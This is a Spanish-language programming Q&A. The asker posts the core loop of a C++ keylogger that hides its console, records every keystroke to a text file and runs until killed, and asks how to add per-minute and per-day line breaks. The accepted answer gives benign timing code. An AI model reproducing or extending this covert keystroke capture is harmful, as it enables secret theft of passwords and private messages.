# Medición de Tiempo en C++ y manejo de fechas

Tags: c++

Estoy desarrollando un Keylogger, en Dev C++, el programa me esta funcionando a la perfección, hasta ahora el único problema que tengo es que quiero que mi programa lleve un conteo de los segundos que pasaron para hacer un salto de linea en el archivo de texto donde guarda todas las teclas que se presionaron, así como también quiero que haga el mismo salto de linea **\n** cuando es una fecha diferente (Osea, cuando detecte que haya pasado un día), mi programa se basa en un bucle **while(true)** que registra todas las teclas hasta que se cierra el programa por el admin. de tareas de Windows. ¿Alguno tiene una idea de como poder lograrlo? ¿Que funciones debo usar y que bibliotecas debo incluir? 
No conozco tanto de C++ como para poder largarme a hacerlo solo pero me interesa lograrlo para expandir un poquito mas el conocimiento del lenguaje.

```
void recon_task(){
    unsigned char key;
    while(true){
        /* Se abre el While */
        FreeConsole();  
        for(key=8;key<=255;key++){
            if(GetAsyncKeyState(key) == -32767){
                if(key_decoder(key) == false){
                    ofstream file;
                    file.open("rec.txt", fstream::app);
                    file << key;
                    file.close();
                }
            }
        }
        /* Cierra el While */
    }
}
```

Comment: Ahí lo edite para que quede claro que era lo que estaba buscando, y ademas me diste la respuesta que necesitaba, perdón por explicarme mal, PD: Hay alguna forma de saber que version de C++ estoy usando? Porque no estoy seguro de tener C++11

Comment: La versión soportada depende de la versión del compilador. Lo mas fácil es que pruebes directamente con los `#include <chrono>`. Si te lo acepta, 99% de que soporta C++11, sea el compilador que sea.

Comment: Por cierto, con la edición la pregunta ahora ya si se adecua a las *reglas* del sitio. Retiro mi voto de cierre, y tienes mi +1 :-)

Answer (score 0, accepted):

Prodias usar time.h y dentro de tu while true haces la validacion de acuerdo al tiempo que necesites. El metodo `fmod` sirve para obtener el modulo de el tipo `double`

```
#include <iostream>
#include <time.h>
#include <cmath>

using namespace std;
void checkTime(){
    time_t inicio = time(0);
    while(true){
        double segundos_transcurridos= difftime( time(0), inicio);
        if( fmod(segundos_transcurridos,60.0)==0 && segundos_transcurridos>0.0){
            cout<<"Paso un minuto "<<segundos_transcurridos<<endl;      
            inicio = time(0);
        }
    }
}
```